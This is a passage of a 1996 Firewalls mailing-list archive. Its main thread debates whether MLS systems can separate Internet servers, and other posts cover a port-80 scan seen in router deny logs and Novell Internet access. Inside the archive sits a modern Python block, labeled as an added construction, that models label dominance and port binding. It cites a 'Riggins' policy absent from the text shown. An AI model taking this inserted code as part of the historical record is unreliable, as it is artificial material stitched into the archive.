> The first is a matter of credibility. Since the relevance
> of anything else I say probably hinges on this, I'll start
> here.
>
> "Does Rick Smith have a clue regarding MLS?"
>
> There are several people at the National Computer Security
> Center and the MISSI Program Office that would be
> astonished by this question.
> Before moving to firewalls I
> was a key designer and the lead systems engineer on the SNS
> Mail Guard, one of the few MLS systems that comes close to
> being a turnkey device (I bring this up as evidence and not
> as a topic of Firewalls discussion - comment privately if
> you must). I've also done a variety of other MLS related
> analysis, design, and implementation tasks. So I do have
> some credentials.
>
> But my background is entirely in high assurance MLS systems.
> Those are systems where MLS has only one meaning: obsessive
> protection of confidentiality in accordance with the Bell
> LaPadula access control rules. Labels define barriers to
> information disclosure, and nothing in the platform
> architecture or services is permitted to compromise
> confidentiality. My statements on what MLS systems can and
> can't do are based on the implications of highly assured
> confidentiality, not on some "strawman" MLS notion nor on
> "misconfigured" MLS systems.

Actually, Rick, your analysis below does show a lack of understanding in the capabilities of most MLS systems. Your analysis assumes that the MAC labels enforced by such systems are strictly hierarchical, e.g.:

    Top Secret
    Secret
    Confidential
    Unclassified

But all B1 systems that I am aware of also provide categories or compartmentalization of levels, creating a two-dimensional array, e.g.

    Classification      Compartments
    --------------      ----------------------------------
    Top Secret          Category A, Category B, ....
    Secret              Category A, Category B, ....
    Confidential        Category A, Category B, ....
    Unclassified        Category A, Category B, ....

The classification is typically an integer. The compartments are usually a bit set. The actual setup can be considerably more complex than this.

In order for information flow to occur, the reader (or recipient) of the information must have a label dominating the label of the information, e.g.,

    its classification >= classification of data
    compartment set a proper superset of the data's compartment set

This has considerable implications in your analysis.

>
> That's where the culture clash comes in. My colleagues in
> this discussion are using B1 MLS systems. These are systems
> where confidentiality protection is not pursued to such an
> extreme. This is *not* intended as a put-down, especially
> in the firewalls environment. Firewalls don't need
> obsessively strong confidentiality. They need integrity
> protection. That's why we put TE in Sidewinder and left out
> MLS -- we see MLS as a confidentiality mechanism and that's
> not what we needed. But if you're using MLS for mandatory
> protection and don't have an obsessively strong
> confidentiality objective, then the picture changes a bit.
>
> Here's how this relates to the last open technical issue:
>
> "Can MLS systems protect Internet servers from one another?"

Of course they can. See below.

>
> I've always recognized that MLS systems can impose mandatory
> protection barriers between processes by using levels,
> categories, and compartments, but I still concluded "No."
> This is based on my view of high assurance MLS obsessed with
> confidentiality. The argument goes as follows:
>
> 1) Typical Internet TCP/IP traffic does not contain labels.
> 2) The network interface in an MLS system is always assigned
> a label.
> 3) If a network interface receives a packet that does not
> already contain a label, then the packet must be assigned
> the network interface's label.
> 4) All packets sent or received as typical Internet TCP/IP
> traffic carry the same label (from 1, 2, 3). Call this
> label the "Internet Label."
> 5) If two processes have the same label, there is no way to
> enforce mandatory MLS protection between them.
> 6) Every network server process is assigned a label.
> 7) A network server process can only send and receive
> packets if the packets' labels are identical to the label
> of the network server process.

Here your understanding of MLS networking breaks down. Read the existing standards, such as RFC 1108 or the DoD's Common Security Label spec. An interface is not controlled by a single label. Rather it is given an accreditation range, or set of labels, over which it can operate, e.g., Outside A, Outside A, Outside AB. You are correct that if it receives an unlabeled packet, most systems will give it a single default label regardless of port.

> 8) Any network server process that handles Internet traffic
> must be assigned the "Internet Label" (from 4, 7).

No, it must be assigned any within the accreditation set of the interface.

> 9) All Internet server processes must be assigned the
> "Internet Label" (from 6, 8).

No, they can be assigned different labels.

> 10) You can't enforce MLS between Internet servers (from 5, 9).

Sure you can -- easily.

    Server 1 (label = outside A)        Server 2 (label = outside B)
              |                                    |
              |                                    |
    Interface (default label = outside,
               accreditation set = outside, outside A, outside B)

With the above configuration, both servers can access the external interface. They can both read/write. They are completely separated by MAC. It is true that they must bind to a port, but the port space is not protected by any label, for it does not by itself contain any information. Proper separation is provided by the underlying protocol stack, which only permits a single process to bind to any given port. I'll certainly admit that it isn't the prettiest solution, but it sure works well. This has been the standard MLS approach for over 7 years, and it is well documented.

We'll skip the remaining analysis, as it is based on incorrect assumptions.

...

>
> But the bottom line answer to the question, in the context
> of *firewalls* and the irrelevance to them of a high
> assurance obsession with confidentiality, appears to be
> "Yes, If." IF the vendor puts in the trusted code to
> associate different port numbers with different MLS process
> labels, THEN their firewall *can* enforce mandatory MLS

As shown above, this is not necessary. Most, if not all, MLS vendors already have these capabilities.

> protection between Internet servers. It's not clear that a
> firewall is "misconfigured" if this degree of protection is
> omitted, but a thorough implementation really should
> include it. So, if you're buying an MLS based firewall,
> look for this feature.
>
> Peace?
>
> Rick.

Now I'm not an expert on Type Enforcement, but we do have a couple of ex-SCC developers here. We've discussed the pros/cons of TE vs. MLS at length for quite some time and have come to the conclusion that ANYTHING that can be done with TE can also be done with MLS and vice versa. Of course the architectures are different, and some problems fit more naturally with one or the other approach. But the capabilities are virtually identical, particularly when applied to firewalls and similar separation problems.

Charles Watt
SecureWare, Inc.
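The label rules argued over in this thread, as an added example that is not code from any poster or from any MLS product: Riggins' "read down, write equal" policy with [proprietary, payroll, medical records] style labels, and Watt's dominance check, interface accreditation range, two servers labeled outside A / outside B, and the unlabeled port space. The level names and their integer ordering, the accreditation set and the port numbers are constructed for the example; dominance is taken as classification >= and compartments a superset (so a label dominates itself).

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional

# Constructed level ordering for the example. Watt's Unclassified < Confidential
# < Secret < Top Secret works the same way: the classification is an integer.
LEVELS = {"public": 0, "outside": 0, "proprietary": 1}


@dataclass(frozen=True)
class Label:
    """MLS label: an integer classification plus a compartment (category) set."""
    level: int
    compartments: FrozenSet[str]

    def dominates(self, other: "Label") -> bool:
        # classification >= and compartments a superset of the data's compartments
        # (assumption: plain superset, so every label dominates itself)
        return self.level >= other.level and self.compartments >= other.compartments


def label(level: str, *compartments: str) -> Label:
    return Label(LEVELS[level], frozenset(compartments))


def can_read(subject: Label, obj: Label) -> bool:
    """'Read down': a process may read data whose label it dominates."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """'Write equal': a process may only write data carrying its own label."""
    return subject == obj


def new_file_label(subject: Label) -> Label:
    """Every file a process creates bears the process's own label."""
    return subject


@dataclass(frozen=True)
class Interface:
    """Network interface with a default label for unlabeled packets and an
    accreditation range (a set of labels) over which it may operate."""
    default: Label
    accreditation: FrozenSet[Label]

    def packet_label(self, carried: Optional[Label] = None) -> Label:
        # Plain Internet traffic carries no label, so it gets the default one.
        return carried if carried is not None else self.default

    def usable_by(self, process: Label) -> bool:
        # A server may use the interface if its label is in the accreditation range.
        return process in self.accreditation


class PortTable:
    """The protocol stack's port space carries no label; it only guarantees
    that a single process binds any given port."""

    def __init__(self) -> None:
        self.bound: Dict[int, Label] = {}

    def bind(self, port: int, process: Label) -> bool:
        if port in self.bound:
            return False
        self.bound[port] = process
        return True


def separation_demo() -> Dict[str, bool]:
    """Watt's two-server configuration: both reach the interface and read its
    unlabeled packets, neither can touch the other's data, and the port table
    keeps their listeners apart (constructed labels and ports)."""
    outside = label("outside")
    server_a = label("outside", "A")
    server_b = label("outside", "B")
    iface = Interface(default=outside,
                      accreditation=frozenset({outside, server_a, server_b}))
    ports = PortTable()
    pkt = iface.packet_label()  # an unlabeled packet from the Internet
    return {
        "a_uses_iface": iface.usable_by(server_a),
        "b_uses_iface": iface.usable_by(server_b),
        "a_reads_packet": can_read(server_a, pkt),
        "b_reads_packet": can_read(server_b, pkt),
        "a_reads_b_data": can_read(server_a, new_file_label(server_b)),
        "a_writes_b_data": can_write(server_a, new_file_label(server_b)),
        "a_binds_80": ports.bind(80, server_a),
        "b_binds_80": ports.bind(80, server_b),
        "b_binds_25": ports.bind(25, server_b),
    }


if __name__ == "__main__":
    payroll_and_medical = label("proprietary", "payroll", "medical records")
    print("combined program reads payroll:",
          can_read(payroll_and_medical, label("proprietary", "payroll")))
    print("combined program writes payroll:",
          can_write(payroll_and_medical, label("proprietary", "payroll")))
    for name, ok in separation_demo().items():
        print(f"{name}: {ok}")
```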
From firewalls-owner Thu Feb 1 08:53:33 1996
Date: Thu, 01 Feb 96 09:25:43 EST
From: "g.kessler"
To: comp.dcom.cell-relay@indiana.edu (Cell Relay list), comp.dcom.frame-relay@indiana.edu (Frame Relay list), bmwg@harvard.edu, fca@amcc.com, fiber-channel-ext@think.com, firewalls@greatcircle.com, giga-owner@tele.pitt.edu, hippi@think.com, ip-atm@hpl.hp.com, ngtrans@sunroog.eng.sun.com, smds@cnri.reston.va.us, smdstc@nis.cerf.net, smds-users@nas.nasa.gov, aft@unify.com
Subject: Re: Local Computer Network CFP...

CALL FOR PAPERS

21st Annual Conference on Local Computer Networks
"The Conference on Practical Leading Edge Computer Networking"
September 29 - October 2, 1996, Minneapolis, Minnesota, USA

Sponsored by: IEEE Computer Society TC - Computer Communications

With the growing trend of personal communications and human central interfaces, future networks, both at home and in the office, will have very different characteristics. Wireless networks and multimedia applications further complicate the system design issue. The number of home offices is growing for environmental or economic reasons. Is there a system equally good for both home and office? Or are they so different that a common system design won't be able to satisfy both? "Networking to/at home and office" will be the focus of the 21st LCN. Papers that cover these areas are explicitly sought and will be given preference.

Sessions are being organized on:

  * Internetworking/Routers/Bridges
  * Multimedia
  * Personal Communications
  * User Interfaces
  * ATM
  * Congestion Control
  * Emerging Technology
  * System Designs
  * Networking to/at home and office
  * High Speed Networks
  * Wireless Networks
  * LANs, MANs and WANs
  * Real-time Networks
  * High Performance Protocols
  * Network Management

Important Dates:

  Submission:   March 14, 1996
  Acceptance:   June 18, 1996
  Camera Copy:  Aug. 1, 1996

For more information, please view the LCN Web page at: http://www.hill.com/lcn/lcn.html

Information for Authors:

All authors must submit 5 copies of the full technical paper in English by mail or delivery services. DO NOT SUBMIT COMPLETE PAPERS BY FAX. However, E-mail submission of a plain postscript file is encouraged. In this case, no encoding (postscript is ASCII) and no compression is allowed. Further, the postscript file must be able to print on 8.5"x11" paper. The first page must contain: title of the paper, authors' names including affiliations, complete mailing address, telephone and fax numbers, E-mail address, and a 250-word (maximum) abstract (double spaced) to Shu-Ping Chang, Program Chair, at the address below:

  Dr. Shu-Ping Chang
  IBM, Thomas J. Watson Research Center
  30 Saw Mill River Road, H2-C18
  Hawthorne, NY 10532 USA
  Phone: +1 914 784-7746
  Fax: +1 914 784-6318
  Internet: spchang@watson.ibm.com

From firewalls-owner Thu Feb 1 08:58:10 1996
Date: Thu, 1 Feb 1996 11:06:55 -0500 (EST)
From: Scott Barman
To: "Andrew K. Bressen"
Cc: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
In-Reply-To: <4eq1q9$q58@bb.hks.net>

On 1 Feb 1996, Andrew K. Bressen wrote:

>
> I'm confronting the same issue with a client right now,
> only with an added problem... more on that; first, here
> is a summary of what I've seen mentioned here and elsewhere,
> plus pointers to the PC magazine reviews of same:
>
>
> Anybody got any others? Please cc me on replies.

BSDI has a system they call "BSDI Internet Gateway for Novell Networks." You may want to check them out at http://www.bsdi.com/products/novell/.

scott

-- 
scott barman            DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman

From firewalls-owner Thu Feb 1 09:23:32 1996
Date: Thu, 1 Feb 1996 09:14:51 -0800 (PST)
From: Leroy Lacy
Subject: Re: Most Secure Unix?
To: Jon Spencer
cc: goertzek@wangfed.com, Firewall List
In-Reply-To: <9601302118.AA02298@tsgops.rtp.dg.com>

Ian: well they are good products. The problem is that the systems are just TCP/IP firewalls and cost an arm and a leg. Most of the night hawks come in for around 100K. If we compete with them, we'll always have a good margin.

Leroy

From firewalls-owner Thu Feb 1 09:53:21 1996
Date: Thu, 01 Feb 1996 10:36:08 -0700
From: netmgr02@cbe.ab.ca (Glen Larwill)
Subject: Scanning from afar...
To: firewalls@greatcircle.com

Has anyone seen this type of network scanning before? Addresses have been changed to protect the innocent and the guilty.

Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet
Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet

The node in question here has scanned a few other subnets looking for connections to port 80. Is this a recognised scanning program or something home grown? I have attempted to contact someone at the remote network, but have not received a response.

Glen Larwill - glarwill@cbe.ab.ca
PH (403) 294-8380, FAX (403) 294-8431
Network Systems Software Analyst
Calgary Board of Education
Calgary Alberta, Canada

From firewalls-owner Thu Feb 1 10:27:36 1996
Date: Thu, 1 Feb 1996 13:14:49 -0500
From: Brad VanOrden
To: maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com
Subject: Re: Securing an anonymous ftp acces

Mondher,

I would suggest two sources. I have always found "UNIX System Administration Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable and they tell you how to set up anonymous ftp. It is published by Prentice Hall and had a 2nd edition published about one year ago. You can reach them at 800-947-7700.

The other is CERT advisory 93:10. It is available via anonymous ftp at: cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also gives you detailed instructions on how to set up anonymous ftp.

Hope this helps!

Brad Van Orden
Rapid Systems Solutions

From firewalls-owner Thu Feb 1 11:09:37 1996
Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Windows 95 clobbering firewall?

(Subject: Sick Puppy struggles to appear legitimate)

I have a couple of sniffers in a network, one just inside the firewall and the other right next to the network management system. The last time I looked at these was about six weeks ago and when looking today I see something new. The DNS running in the firewall used to get about 10 connects every 12 hours from the company's internal mail system but now the firewall DNS is getting about 10,800 connects every day from the network management system (NMS). The sniffer watching the NMS shows that new Windows 95 machines are connecting to it with NetBios on port 137, NetBios Name Service. It looks like the NMS box in turn queries the firewall. The firewall itself seems to be a Pentium machine, handling about 4,000 incoming messages per day, 3,000 outgoing messages per day and a web user population of about 150 users.
Two questions:
1) will the increased DNS queries cause the firewall performance (throughput/response time) to drop;
2) has anyone else seen a similar situation;
3) how would you stop these evil little Windows 95 weevils from nibbling away at the firewall DNS?
Yeah, I know. Dawgs have trouble counting. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter
From firewalls-owner Thu Feb 1 13:23:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01287 for firewalls-outgoing; Thu, 1 Feb 1996 13:18:52 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01278 for ; Thu, 1 Feb 1996 13:18:45 -0800 (PST) Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id QAA13623; Thu, 1 Feb 1996 16:20:21 -0500 Date: Thu, 1 Feb 1996 16:20:21 -0500 Message-Id: <199602012120.QAA13623@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: netmgr02@cbe.ab.ca (Glen Larwill), firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: Scanning from afar... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Hmmm. Someone really wants to know if you are running any WWW servers. Given the times between access list logs, they must be using a scanning tool.

At 10:36 AM 2/1/96 -0700, Glen Larwill wrote:
>Has anyone seen this type of network scanning before? Addresses have been changed to protect the innocent and the guilty.
>
>Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
>Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
>Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
>Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
>Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
>Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
>Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
>Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
>Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
>Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet
>Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
>Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
>Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
>Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
>Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
>Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
>Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
>Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
>Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
>Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
>Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
>Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
>Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
>Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
>Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
>Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
>Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
>Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
>Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
>Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet
>
>The node in question here has scanned a few other subnets looking for connections to port 80. Is this a recognised scanning program or something home grown?
>
>I have attempted to contact someone at the remote network, but have not received a response.
> > Glen Larwill - glarwill@cbe.ab.ca _/_/_/_/ _/_/_/_/ _/_/_/_/ > PH (403) 294-8380, FAX (403) 294-8431 _/ _/ _/ _/ > Network Systems Software Analyst _/ _/_/_/_/ _/_/_/ > Calgary Board of Education _/ _/ _/ _/ > Calgary Alberta, Canada _/_/_/_/ _/_/_/_/ _/_/_/_/ > > > --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | ---------------------------------------
From firewalls-owner Thu Feb 1 13:43:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01454 for firewalls-outgoing; Thu, 1 Feb 1996 13:29:39 -0800 (PST) Received: from main.geminisecure.com (main.geminisecure.com [205.179.16.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01449 for ; Thu, 1 Feb 1996 13:29:35 -0800 (PST) Received: (from leonard@localhost) by main.geminisecure.com (8.6.9/8.6.9) id NAA15680; Thu, 1 Feb 1996 13:18:10 -0800 Date: Thu, 1 Feb 1996 13:18:10 -0800 (PST) From: Leonard Miyata To: Jane Ferreira Cunha cc: firewalls@GreatCircle.COM Subject: Re: What are MLS and TE? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote:
> Please, where can I find some explanation about MLS and TE? I've seen a lot of discussion about them, but so far I could understand it. Are they in a FAQ somewhere?
>
> TIA,
>
> Jane

For MLS, the official standards are Department of Defense Trusted Computer System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted Network Interpretation (TNI) NCSC-TG-005.
A good book for the Operating System implications is 'Building A Secure Computer System' by Morrie Gasser. For TE, the best source is probably the SCC Web site. I believe there is a recent article in BYTE magazine (Jan or Feb 96) as well Leonard Miyata aka leonard@geminisecure.com GEMINI COMPUTERS INC Company web site http://www.geminisecure.com From firewalls-owner Thu Feb 1 13:58:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01498 for firewalls-outgoing; Thu, 1 Feb 1996 13:32:33 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01493 for ; Thu, 1 Feb 1996 13:32:27 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24564; Fri, 2 Feb 1996 08:29:03 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17222; Fri, 2 Feb 1996 08:35:19 +1100 From: Jas (Matthew K) Message-Id: <199602012135.IAA17222@maverick.itd.uts.edu.au> Subject: Re: Internet-access from Novell To: ewoodrick@ed-com.com (Ed Woodrick) Date: Fri, 2 Feb 1996 08:35:18 +1100 (EST) Cc: firewalls@greatcircle.com (Firewalls Mailing List) In-Reply-To: from "Ed Woodrick" at Feb 1, 96 07:27:52 am X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) 
C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Ed Woodrick wrote this...
> I know that this is probably a radical answer, but what about using Novell access permissions to restrict access to the data? I don't know why you would want to go to the trouble of putting up firewalls when just a simple permission change should work. It's a lot easier and I expect a lot safer to perform security at the operating system level than at the network level.
> Ed Woodrick

ARGH! Isn't the failure to do this with Unix a lesson? Just setting user permission access to data normally isn't enough (unless you have a B2+ system with MAC, and even then sometimes). Novell can be hacked, and if you leave the network open someone will do it.

Matt
-- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.
-- Rob Pike
